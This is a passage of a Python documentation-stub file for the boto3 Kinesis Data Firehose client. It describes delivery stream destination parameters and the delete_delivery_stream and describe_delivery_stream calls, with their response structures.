Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ElasticsearchDestinationConfiguration (dict) -- The destination in Amazon ES. You can specify only one destination.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IAM role to be assumed by Kinesis Data Firehose for calling the Amazon ES Configuration API and for indexing documents. For more information, see Grant Kinesis Data Firehose Access to an Amazon S3 Destination and Amazon Resource Names (ARNs) and AWS Service Namespaces .
DomainARN (string) --The ARN of the Amazon ES domain. The IAM role must have permissions for DescribeElasticsearchDomain , DescribeElasticsearchDomains , and DescribeElasticsearchDomainConfig after assuming the role specified in RoleARN . For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Specify either ClusterEndpoint or DomainARN .
ClusterEndpoint (string) --The endpoint to use when communicating with the cluster. Specify either this ClusterEndpoint or the DomainARN field.
IndexName (string) -- [REQUIRED]The Elasticsearch index name.
TypeName (string) --The Elasticsearch type name. For Elasticsearch 6.x, there can be only one type per index. If you try to specify a new type for an existing index that already has another type, Kinesis Data Firehose returns an error during run time.
For Elasticsearch 7.x, don't specify a TypeName .
IndexRotationPeriod (string) --The Elasticsearch index rotation period. Index rotation appends a timestamp to the IndexName to facilitate the expiration of old data. For more information, see Index Rotation for the Amazon ES Destination . The default value is OneDay .
BufferingHints (dict) --The buffering options. If no value is specified, the default values for ElasticsearchBufferingHints are used.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300 (5 minutes).
SizeInMBs (integer) --Buffer incoming data to the specified size, in MBs, before delivering it to the destination. The default value is 5.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MB/sec, the value should be 10 MB or higher.
RetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon ES. The default value is 300 (5 minutes).
DurationInSeconds (integer) --After an initial failure to deliver to Amazon ES, the total amount of time during which Kinesis Data Firehose retries delivery (including the first attempt). After this time has elapsed, the failed documents are written to Amazon S3. Default value is 300 seconds (5 minutes). A value of 0 (zero) results in no retries.
S3BackupMode (string) --Defines how documents should be delivered to Amazon S3. When it is set to FailedDocumentsOnly , Kinesis Data Firehose writes any documents that could not be indexed to the configured Amazon S3 destination, with elasticsearch-failed/ appended to the key prefix. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents with elasticsearch-failed/ appended to the prefix. For more information, see Amazon S3 Backup for the Amazon ES Destination . Default value is FailedDocumentsOnly .
S3Configuration (dict) -- [REQUIRED]The configuration for the backup Amazon S3 location.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --The data processing configuration.
Enabled (boolean) --Enables or disables data processing.
Processors (list) --The data processors.
(dict) --Describes a data processor.
Type (string) -- [REQUIRED]The type of processor.
Parameters (list) --The processor parameters.
(dict) --Describes the processor parameter.
ParameterName (string) -- [REQUIRED]The name of the parameter.
ParameterValue (string) -- [REQUIRED]The parameter value.
CloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
VpcConfiguration (dict) --The details of the VPC of the Amazon ES destination.
SubnetIds (list) -- [REQUIRED]The IDs of the subnets that you want Kinesis Data Firehose to use to create ENIs in the VPC of the Amazon ES destination. Make sure that the routing tables and inbound and outbound rules allow traffic to flow from the subnets whose IDs are specified here to the subnets that have the destination Amazon ES endpoints. Kinesis Data Firehose creates at least one ENI in each of the subnets that are specified here. Do not delete or modify these ENIs.
The number of ENIs that Kinesis Data Firehose creates in the subnets specified here scales up and down automatically based on throughput. To enable Kinesis Data Firehose to scale up the number of ENIs to match throughput, ensure that you have sufficient quota. To help you calculate the quota you need, assume that Kinesis Data Firehose can create up to three ENIs for this delivery stream for each of the subnets specified here. For more information about ENI quota, see Network Interfaces in the Amazon VPC Quotas topic.
(string) --
RoleARN (string) -- [REQUIRED]The ARN of the IAM role that you want the delivery stream to use to create endpoints in the destination VPC.
SecurityGroupIds (list) -- [REQUIRED]The IDs of the security groups that you want Kinesis Data Firehose to use when it creates ENIs in the VPC of the Amazon ES destination.
(string) --
SplunkDestinationConfiguration (dict) -- The destination in Splunk. You can specify only one destination.
HECEndpoint (string) -- [REQUIRED]The HTTP Event Collector (HEC) endpoint to which Kinesis Data Firehose sends your data.
HECEndpointType (string) -- [REQUIRED]This type can be either "Raw" or "Event."
HECToken (string) -- [REQUIRED]This is a GUID that you obtain from your Splunk cluster when you create a new HEC endpoint.
HECAcknowledgmentTimeoutInSeconds (integer) --The amount of time that Kinesis Data Firehose waits to receive an acknowledgment from Splunk after it sends it data. At the end of the timeout period, Kinesis Data Firehose either tries to send the data again or considers it an error, based on your retry settings.
RetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver data to Splunk, or if it doesn't receive an acknowledgment of receipt from Splunk.
DurationInSeconds (integer) --The total amount of time that Kinesis Data Firehose spends on retries. This duration starts after the initial attempt to send data to Splunk fails. It doesn't include the periods during which Kinesis Data Firehose waits for acknowledgment from Splunk after each attempt.
S3BackupMode (string) --Defines how documents should be delivered to Amazon S3. When set to FailedDocumentsOnly , Kinesis Data Firehose writes any data that could not be indexed to the configured Amazon S3 destination. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents to Amazon S3. Default value is FailedDocumentsOnly .
S3Configuration (dict) -- [REQUIRED]The configuration for the backup Amazon S3 location.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --The data processing configuration.
Enabled (boolean) --Enables or disables data processing.
Processors (list) --The data processors.
(dict) --Describes a data processor.
Type (string) -- [REQUIRED]The type of processor.
Parameters (list) --The processor parameters.
(dict) --Describes the processor parameter.
ParameterName (string) -- [REQUIRED]The name of the parameter.
ParameterValue (string) -- [REQUIRED]The parameter value.
CloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
Tags (list) -- A set of tags to assign to the delivery stream. A tag is a key-value pair that you can define and assign to AWS resources. Tags are metadata. For example, you can add friendly names and descriptions or other types of information that can help you distinguish the delivery stream. For more information about tags, see Using Cost Allocation Tags in the AWS Billing and Cost Management User Guide.
You can specify up to 50 tags when creating a delivery stream.
(dict) --Metadata that you can assign to a delivery stream, consisting of a key-value pair.
Key (string) -- [REQUIRED]A unique identifier for the tag. Maximum length: 128 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @
Value (string) --An optional string, which you can use to describe or define the tag. Maximum length: 256 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @
"""
pass
def delete_delivery_stream(DeliveryStreamName=None, AllowForceDelete=None):
    """Delete a delivery stream and its data.

    To check the state of a delivery stream, use DescribeDeliveryStream. A
    delivery stream can be deleted only while it is in one of the following
    states: ACTIVE, DELETING, CREATING_FAILED, or DELETING_FAILED. A delivery
    stream that is in the CREATING state can't be deleted. While the deletion
    request is in process, the delivery stream is in the DELETING state.

    While the delivery stream is in the DELETING state, the service might
    continue to accept records, but it doesn't make any guarantees with
    respect to delivering the data. Therefore, as a best practice, first stop
    any applications that are sending records before you delete a delivery
    stream.

    See also: AWS API Documentation

    Example::

        response = client.delete_delivery_stream(
            DeliveryStreamName='string',
            AllowForceDelete=True|False
        )

    :type DeliveryStreamName: string
    :param DeliveryStreamName: [REQUIRED]
        The name of the delivery stream.
    :type AllowForceDelete: boolean
    :param AllowForceDelete: Set this to true if you want to delete the
        delivery stream even if Kinesis Data Firehose is unable to retire the
        grant for the CMK. Kinesis Data Firehose might be unable to retire the
        grant due to a customer error, such as when the CMK or the grant are
        in an invalid state. If you force deletion, you can then use the
        RevokeGrant operation to revoke the grant you gave to Kinesis Data
        Firehose. If a failure to retire the grant happens due to an AWS KMS
        issue, Kinesis Data Firehose keeps retrying the delete operation.
        The default value is false.
    :rtype: dict

    Response Syntax::

        {}

    Response Structure:
        (dict) -- An empty response object.

    Exceptions:
        Firehose.Client.exceptions.ResourceInUseException
        Firehose.Client.exceptions.ResourceNotFoundException
    """
    # Documentation-only stub: the real call is dispatched by the boto3
    # client at runtime, so there is nothing to execute here.
    pass
def describe_delivery_stream(DeliveryStreamName=None, Limit=None, ExclusiveStartDestinationId=None):
"""
Describes the specified delivery stream and its status. For example, after your delivery stream is created, call DescribeDeliveryStream to see whether the delivery stream is ACTIVE and therefore ready for data to be sent to it.
If the status of a delivery stream is CREATING_FAILED , this status doesn\'t change, and you can\'t invoke CreateDeliveryStream again on it. However, you can invoke the DeleteDeliveryStream operation to delete it. If the status is DELETING_FAILED , you can force deletion by invoking DeleteDeliveryStream again but with DeleteDeliveryStreamInput$AllowForceDelete set to true.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_delivery_stream(
DeliveryStreamName='string',
Limit=123,
ExclusiveStartDestinationId='string'
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream.\n
:type Limit: integer
:param Limit: The limit on the number of destinations to return. You can have one destination per delivery stream.
:type ExclusiveStartDestinationId: string
:param ExclusiveStartDestinationId: The ID of the destination to start returning the destination information. Kinesis Data Firehose supports one destination per delivery stream.
:rtype: dict
ReturnsResponse Syntax
{
'DeliveryStreamDescription': {
'DeliveryStreamName': 'string',
'DeliveryStreamARN': 'string',
'DeliveryStreamStatus': 'CREATING'|'CREATING_FAILED'|'DELETING'|'DELETING_FAILED'|'ACTIVE',
'FailureDescription': {
'Type': 'RETIRE_KMS_GRANT_FAILED'|'CREATE_KMS_GRANT_FAILED'|'KMS_ACCESS_DENIED'|'DISABLED_KMS_KEY'|'INVALID_KMS_KEY'|'KMS_KEY_NOT_FOUND'|'KMS_OPT_IN_REQUIRED'|'CREATE_ENI_FAILED'|'DELETE_ENI_FAILED'|'SUBNET_NOT_FOUND'|'SECURITY_GROUP_NOT_FOUND'|'ENI_ACCESS_DENIED'|'SUBNET_ACCESS_DENIED'|'SECURITY_GROUP_ACCESS_DENIED'|'UNKNOWN_ERROR',
'Details': 'string'
},
'DeliveryStreamEncryptionConfiguration': {
'KeyARN': 'string',
'KeyType': 'AWS_OWNED_CMK'|'CUSTOMER_MANAGED_CMK',
'Status': 'ENABLED'|'ENABLING'|'ENABLING_FAILED'|'DISABLED'|'DISABLING'|'DISABLING_FAILED',
'FailureDescription': {
'Type': 'RETIRE_KMS_GRANT_FAILED'|'CREATE_KMS_GRANT_FAILED'|'KMS_ACCESS_DENIED'|'DISABLED_KMS_KEY'|'INVALID_KMS_KEY'|'KMS_KEY_NOT_FOUND'|'KMS_OPT_IN_REQUIRED'|'CREATE_ENI_FAILED'|'DELETE_ENI_FAILED'|'SUBNET_NOT_FOUND'|'SECURITY_GROUP_NOT_FOUND'|'ENI_ACCESS_DENIED'|'SUBNET_ACCESS_DENIED'|'SECURITY_GROUP_ACCESS_DENIED'|'UNKNOWN_ERROR',
'Details': 'string'
}
},
'DeliveryStreamType': 'DirectPut'|'KinesisStreamAsSource',
'VersionId': 'string',
'CreateTimestamp': datetime(2015, 1, 1),
'LastUpdateTimestamp': datetime(2015, 1, 1),
'Source': {
'KinesisStreamSourceDescription': {
'KinesisStreamARN': 'string',
'RoleARN': 'string',
'DeliveryStartTimestamp': datetime(2015, 1, 1)
}
},
'Destinations': [
{
'DestinationId': 'string',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ExtendedS3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'DataFormatConversionConfiguration': {
'SchemaConfiguration': {
'RoleARN': 'string',
'CatalogId': 'string',
'DatabaseName': 'string',
'TableName': 'string',
'Region': 'string',
'VersionId': 'string'
},
'InputFormatConfiguration': {
'Deserializer': {
'OpenXJsonSerDe': {
'ConvertDotsInJsonKeysToUnderscores': True|False,
'CaseInsensitive': True|False,
'ColumnToJsonKeyMappings': {
'string': 'string'
}
},
'HiveJsonSerDe': {
'TimestampFormats': [
'string',
]
}
}
},
'OutputFormatConfiguration': {
'Serializer': {
'ParquetSerDe': {
'BlockSizeBytes': 123,
'PageSizeBytes': 123,
'Compression': 'UNCOMPRESSED'|'GZIP'|'SNAPPY',
'EnableDictionaryCompression': True|False,
'MaxPaddingBytes': 123,
'WriterVersion': 'V1'|'V2'
},
'OrcSerDe': {
'StripeSizeBytes': 123,
'BlockSizeBytes': 123,
'RowIndexStride': 123,
'EnablePadding': True|False,
'PaddingTolerance': 123.0,
'Compression': 'NONE'|'ZLIB'|'SNAPPY',
'BloomFilterColumns': [
'string',
],
'BloomFilterFalsePositiveProbability': 123.0,
'DictionaryKeyThreshold': 123.0,
'FormatVersion': 'V0_11'|'V0_12'
}
}
},
'Enabled': True|False
}
},
'RedshiftDestinationDescription': {
'RoleARN': 'string',
'ClusterJDBCURL': 'string',
'CopyCommand': {
'DataTableName': 'string',
'DataTableColumns': 'string',
'CopyOptions': 'string'
},
'Username': 'string',
'RetryOptions': {
'DurationInSeconds': 123
},
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ElasticsearchDestinationDescription': {
'RoleARN': 'string',
'DomainARN': 'string',
'ClusterEndpoint': 'string',
'IndexName': 'string',
'TypeName': 'string',
'IndexRotationPeriod': 'NoRotation'|'OneHour'|'OneDay'|'OneWeek'|'OneMonth',
'BufferingHints': {
'IntervalInSeconds': 123,
'SizeInMBs': 123
},
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedDocumentsOnly'|'AllDocuments',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'VpcConfigurationDescription': {
'SubnetIds': [
'string',
],
'RoleARN': 'string',
'SecurityGroupIds': [
'string',
],
'VpcId': 'string'
}
},
'SplunkDestinationDescription': {
'HECEndpoint': 'string',
'HECEndpointType': 'Raw'|'Event',
'HECToken': 'string',
'HECAcknowledgmentTimeoutInSeconds': 123,
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedEventsOnly'|'AllEvents',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
}
},
],
'HasMoreDestinations': True|False
}
}
Response Structure
(dict) --
DeliveryStreamDescription (dict) --
Information about the delivery stream.
DeliveryStreamName (string) --
The name of the delivery stream.
DeliveryStreamARN (string) --
The Amazon Resource Name (ARN) of the delivery stream. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
DeliveryStreamStatus (string) --
The status of the delivery stream. If the status of a delivery stream is CREATING_FAILED , this status doesn\'t change, and you can\'t invoke CreateDeliveryStream again on it. However, you can invoke the DeleteDeliveryStream operation to delete it.
FailureDescription (dict) --
Provides details in case one of the following operations fails due to an error related to KMS: CreateDeliveryStream , DeleteDeliveryStream , StartDeliveryStreamEncryption , StopDeliveryStreamEncryption .
Type (string) --
The type of error that caused the failure.
Details (string) --
A message providing details about the error that caused the failure.
DeliveryStreamEncryptionConfiguration (dict) --
Indicates the server-side encryption (SSE) status for the delivery stream.
KeyARN (string) --
If KeyType is CUSTOMER_MANAGED_CMK , this field contains the ARN of the customer managed CMK. If KeyType is AWS_OWNED_CMK , DeliveryStreamEncryptionConfiguration doesn\'t contain a value for KeyARN .
KeyType (string) --
Indicates the type of customer master key (CMK) that is used for encryption. The default setting is AWS_OWNED_CMK . For more information about CMKs, see Customer Master Keys (CMKs) .
Status (string) --
This is the server-side encryption (SSE) status for the delivery stream. For a full description of the different values of this status, see StartDeliveryStreamEncryption and StopDeliveryStreamEncryption . If this status is ENABLING_FAILED or DISABLING_FAILED , it is the status of the most recent attempt to enable or disable SSE, respectively.
FailureDescription (dict) --
Provides details in case one of the following operations fails due to an error related to KMS: CreateDeliveryStream , DeleteDeliveryStream , StartDeliveryStreamEncryption , StopDeliveryStreamEncryption .
Type (string) --
The type of error that caused the failure.
Details (string) --
A message providing details about the error that caused the failure.
DeliveryStreamType (string) --
The delivery stream type. This can be one of the following values:
DirectPut : Provider applications access the delivery stream directly.
KinesisStreamAsSource : The delivery stream uses a Kinesis data stream as a source.
VersionId (string) --
Each time the destination is updated for a delivery stream, the version ID is changed, and the current version ID is required when updating the destination. This is so that the service knows it is applying the changes to the correct version of the delivery stream.
CreateTimestamp (datetime) --
The date and time that the delivery stream was created.
LastUpdateTimestamp (datetime) --
The date and time that the delivery stream was last updated.
Source (dict) --
If the DeliveryStreamType parameter is KinesisStreamAsSource , a SourceDescription object describing the source Kinesis data stream.
KinesisStreamSourceDescription (dict) --
The KinesisStreamSourceDescription value for the source Kinesis data stream.
KinesisStreamARN (string) --
The Amazon Resource Name (ARN) of the source Kinesis data stream. For more information, see Amazon Kinesis Data Streams ARN Format .
RoleARN (string) --
The ARN of the role used by the source Kinesis data stream. For more information, see AWS Identity and Access Management (IAM) ARN Format .
DeliveryStartTimestamp (datetime) --
Kinesis Data Firehose starts retrieving records from the Kinesis data stream starting with this timestamp.
Destinations (list) --
The destinations.
(dict) --
Describes the destination for a delivery stream.
DestinationId (string) --
The ID of the destination.
S3DestinationDescription (dict) --
[Deprecated] The destination in Amazon S3.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ExtendedS3DestinationDescription (dict) --
The destination in Amazon S3.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
